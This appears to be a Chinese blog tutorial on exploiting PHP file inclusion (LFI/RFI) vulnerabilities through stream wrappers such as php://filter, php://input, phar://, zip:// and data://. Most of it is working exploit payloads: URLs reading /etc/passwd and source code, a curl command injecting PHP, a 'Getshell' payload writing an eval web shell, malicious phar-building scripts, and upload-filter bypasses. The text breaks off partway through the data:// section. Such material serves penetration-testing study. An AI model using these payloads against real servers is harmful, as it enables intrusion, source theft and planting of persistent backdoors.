fopen打开ftp文件_PHP文件包含漏洞利用思路与Bypass总结

相关函数

四个函数

php中引发文件包含漏洞的通常主要是以下四个函数:

1、include()

http://www.php.net/manual/en/function.include.php

2、include_once()

http://php.net/manual/en/function.include-once.php

3、require()

http://php.net/manual/en/function.require.php

4、require_once()

http://php.net/manual/en/function.require-once.php

函数功能

当利用这四个函数来包含文件时,不管文件是什么类型(图片、txt等等),都会直接作为php文件进行解析。

5d83738cca926c1cd7b59a4cec0fdb1c.png

函数差异

include()

include() 函数包含出错的话,只会提出警告,不会影响后续语句的执行

bc0d95d8076d8133fcc5c5549ba92991.png

require()

require() 函数包含出错的话,则会直接退出,后续语句不在执行

2578aa1017e635b4aca11afa84a22390.png

include_once() 和 require_once()

require_once() 和 include_once() 功能与require() 和 include() 类似。但如果一个文件已经被包含过了,则 require_once() 和 include_once() 则不会再包含它,以避免函数重定义或变量重赋值等问题。

二次包含

2ccb7c5c419f227153f97cb31d1d303c.png

一次包含

81c9ab9aecb1a55c866af017cbd79f48.png

漏洞原因

文件包含函数所加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致执行了非预期的代码。

漏洞分类

LFI

LFI本地文件包含漏洞主要是包含本地服务器上存储的一些文件,例如session文件、日志文件、临时文件等。同时借助此漏洞也可以查看服务器上的一些重要文件。但是,只有我们能够控制包含的文件存储我们的恶意代码才能拿到服务器权限。

例如本地读取 /etc/passwd 系统重要文件

e245894bd7aa5e1493dc3dfaba1d373b.png

RFI

RFI(Remote File Inclusion) 远程文件包含漏洞。是指能够包含远程服务器上的文件并执行。由于远程服务器的文件是我们可控的,因此漏洞一旦存在危害性会很大。但RFI的利用条件较为苛刻,需要php.ini中进行配置

allow_url_fopen = Onallow_url_include = On

allow_url_fopen = On

该选项为on便是激活了 URL 形式的 fopen 封装协议使得可以访问 URL 对象文件等。

allow_url_include:On

该选项为on便是允许 包含URL 对象文件等。

两个配置选项均需要为On,才能远程包含文件成功

修改php.ini

8f8581b69eca5f32d62ba32cab07ec9e.png

在php.ini中,allow_url_fopen默认一直是On,而allow_url_include从php5.2之后就默认为Off。

php5.5.9 -> php.ini

05fd412a91b0e5d2b9370f4954fef28c.png

包含姿势

php伪协议

PHP 带有很多内置 URL 风格的封装协议,可用于类似 fopen()、 copy()、 file_exists() 和 filesize() 的文件系统函数。除了这些封装协议,还能通过 stream_wrapper_register() 来注册自定义的封装协议。

file:// — 访问本地文件系统http:// — 访问 HTTP(s) 网址ftp:// — 访问 FTP(s) URLsphp:// — 访问各个输入/输出流(I/O streams)zlib:// — 压缩流data:// — 数据(RFC 2397)glob:// — 查找匹配的文件路径模式phar:// — PHP 归档ssh2:// — Secure Shell 2rar:// — RARogg:// — 音频流expect:// — 处理交互式的流

可以在phpinfo中的 Registered PHP Streams 中找到可使用的协议。

下面测试代码均为:

<?php $file  = $_GET['file'];    include($file);?>

若有特殊案例,会声明。

php.ini

allow_url_fopen 默认为 Onallow_url_include 默认为 Off

若有特殊要求,会在利用条件里指出。

php://filter

php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。

参数

81cf966a313c6c679d8b9782afb76325.png

过滤器列表

  • 字符串过滤器
  • string.strip_tags
  • 转换过滤器
  • 压缩过滤器
  • 加密过滤器
可用过滤器列表:https://www.php.net/manual/zh/filters.php

利用条件 :无

利用姿势1

index.php?file=php://filter/read=convert.base64-encode/resource=index.php

通过指定末尾的文件,可以读取经base64加密后的文件源码,之后再base64解码一下就行。虽然不能直接获取到shell等,但能读取敏感文件危害也是挺大的。同时也能够对网站源码进行审计。

5bbea12da66e0186c10ff24b1fb01d88.png

利用姿势2

index.php?file=php://filter/convert.base64-encode/resource=index.php

效果跟前面一样,只是少了个read关键字,在绕过一些waf时也许有用。

file://

专们用于访问本地文件系统和php://filter类似都可以对本地文件进行读取

用法

/path/to/file.extrelative/path/to/file.extfileInCwd.extC:/path/to/winfile.extC:pathowinfile.extsmbserversharepathowinfile.extfile:///path/to/file.ext?file=file://[文件的绝对路径+文件名]

利用条件 :无

利用姿势

index.php?file=file:///etc/passwd
6641a5c3590a11e2b827d7eb882d8745.png

php://input

php://input 是个可以访问请求的原始数据的只读流,将post请求中的数据作为PHP代码执行。

利用条件

allow_url_include = Onallow_url_fopen = On/Off

利用姿势

index.php?file=php://inputPOST:<?php phpinfo();?>/ phpinfo();?>
c0bc70467880d8d3096c4763a5a49e03.png

也可以使用 burpsuite 或 curl 进行利用

curl -v "http://127.0.0.1/FI/index.php?file=php://input" -d "<?php phpinfo();?>"

Getshell

POST:<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[Qftm])?>');?>

file_get_contents()的利用

file_get_contents() 函数将整个文件读入一个字符串中

测试代码

<?php $file  = $_GET['file'];if(file_get_contents($file,'r') == "Qftm"){    echo "you are Admin!!!";}?>

利用条件:无

利用姿势:

file_get.php?file=php://inputPOST:Qftm

php://input 可以访问请求的原始数据的只读流。即可以直接读取到POST上没有经过解析的原始数据。enctype=”multipart/form-data” 的时候 php://input 是无效的。

9ab017657afa3418d43127b8b7655404.png

phar://

phar:// 支持 zip 、 phar 格式的文件包含。

  • zip

用法

?file=phar://[压缩包文件相对路径]/[压缩文件内的子文件名]?file=phar://[压缩包文件绝对路径]/[压缩文件内的子文件名]

利用条件 :php >= 5.3.0

利用姿势1

配合文件上传漏洞,当仅可以上传zip格式时

index.php?file=phar://index.zip/index.txtindex.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/index.zip/index.txt

新建index.txt,使用zip格式压缩 -> index.zip

cca9765e969d6cb6af76696e3a48c56e.png

利用姿势2

配合文件上传漏洞,当仅可以上传图片格式时

针对 phar:// 不管后缀是什么,都会当做压缩包来解压。

index.php?file=phar://head.png/head.txtindex.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.png/head.txt

将做好的zip后缀改为png格式

5ceac9cbca4537f9e4035c29a91e4124.png
  • phar

phar文件本质上是也一种压缩文件。

用法

?file=phar://[压缩包文件相对路径]/[压缩文件内的子文件名]?file=phar://[压缩包文件绝对路径]/[压缩文件内的子文件名]

制作phar文件

制作包含恶意代码文件的phar文件

(1)确保本地 php.ini 中 phar.readonly=Off

e8c0224bcec31d6c6ba5737764263281.png

(2)编写恶意phar文件的php脚本

phar.php

<?php @unlink("phar.phar");    $phar = new Phar("phar.phar");    $phar->startBuffering();    $phar->setStub("<?php __HALT_COMPILER(); ?>");  //设置stub    $phar->addFromString("head.txt", "<?php phpinfo();?>");  //添加要压缩的文件及内容    //签名自动计算     $phar->stopBuffering();?>

(3)生成phar文件

<?php $p = new PharData(dirname(__FILE__).'/phartest.aaa', 0,'phartest',Phar::ZIP) ;$p->addFromString('testfile.txt', '<?php phpinfo();?>'); ?>
de49d92a5a7a4c9741c77f83fc29bf41.png

利用条件 :php >= 5.3.0

利用姿势1

index.php?file=phar://phar.phar/head.txtindex.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/phar.phar/head.txt
24ed11d03f927fb6196e882a74913aef.png

利用姿势2

index.php?file=phar://phar.png/head.txtindex.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/phar.png/head.txt

利用协议特性,更改后缀文件可适当绕过一些限制

d740ffb274874d738441d4664d9ba68f.png

zip://

zip协议 和 phar协议 类似,都支持 相对路径 和 绝对路径 (几乎网上所有人都说 zip协议 不支持 相对路径 ,事实上是可以!!!)

在 php version 5.2.9 时已经修复 zip:// 相对路径问题

05ed33ac3c4b44771154edabfd34faa3.png

使用zip协议,需将 # 编码为 %23 (浏览器时)

用法

?file=zip://[压缩包文件相对路径]#[压缩文件内的子文件名]?file=zip://[压缩包文件绝对路径]#[压缩文件内的子文件名]

利用条件 :php >= 5.2(绝对路径) | php >= 5.29(相对/绝对路径)

利用姿势1

index.php?file=zip://head.zip%23head.txtindex.php?file=zip://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.zip%23head.txt
643fe1fcd20f657e77ea1d6876cc7909.png

利用姿势2

针对 zip:// 不管后缀是什么,都会当做压缩包来解压,可以适当的绕过一些限制。

index.php?file=zip://head.png%23head.txtindex.php?file=zip://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.png%23head.txt

相对路径

php5.3.29 windows

e8486905be71e0d7000f72e08d917d9a.png

php5.5.9 windows

e9006e3ea3573cdd56159b53f9625ba1.png

5.4.16 Linux Centos7

6052361569b2d22758c9771c311138ab.png

绝对路径

windwos

e558240521479a09e077bd6bd7b12e66.png

Linux Centos7

bf427af73f866332abdaa1cc4182c100.png

bzip2://

用法

?file=compress.bzip2://[压缩包文件相对路径]?file=compress.bzip2://[压缩包文件绝对路径]

利用条件 :php >= 5.2

利用姿势1

index.php?file=compress.bzip2://head.bz2index.php?file=compress.bzip2://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.bz2

相对路径

ad57f28a7849eacf3627536a8d4a071c.png

绝对路径

faf84094ee25ab2af2c9d2f1fe7d45e1.png

利用姿势2

利用协议特性,更改后缀文件可适当绕过一些限制

index.php?file=compress.bzip2://head.jpgindex.php?file=compress.bzip2://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.jpg
ec969922ad3aebdd1ed6dd377e202bf4.png

zlib://

用法

?file=compress.zlib://[压缩包文件相对路径]?file=compress.zlib://[压缩包文件绝对路径]

利用条件 :php >= 5.2

利用姿势1

index.php?file=compress.zlib://head.gzindex.php?file=compress.zlib://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.gz

相对路径

43d2070b56332756ddcf43b3010e9c6a.png

绝对路径

ead974508404525db1c8e877579eabfa.png

利用姿势2

利用协议特性,更改后缀文件可适当绕过一些限制

index.php?file=compress.zlib://head.jpgindex.php?file=compress.zlib://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.jpg
ef75aca417ffc51172badff6dfe978ff.png

data://

数据流封装器,和php://相似都是利用了流的概念

用法

data:, data:text/plain,data:text/html,data:text/html;base64,data:text/css,data:text/css;base64,data:text/javascript,data:text/javascript;base64,data:image/gif;base64,base64编码的gif图片数据data:image/png;base64,base64编码的png图片数据data:image/jpeg;base64,base64编码的jpeg图片数据data:image/x-icon;base64,base64编码的icon图片数据

利用条件

php >= 5.2allow_url_fopen = Onallow_url_include = On

利用姿势1

index.php?file=data:text/plain,<?php phpinfo();?>index.php?file=data://text/plain,<?php phpinfo();
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值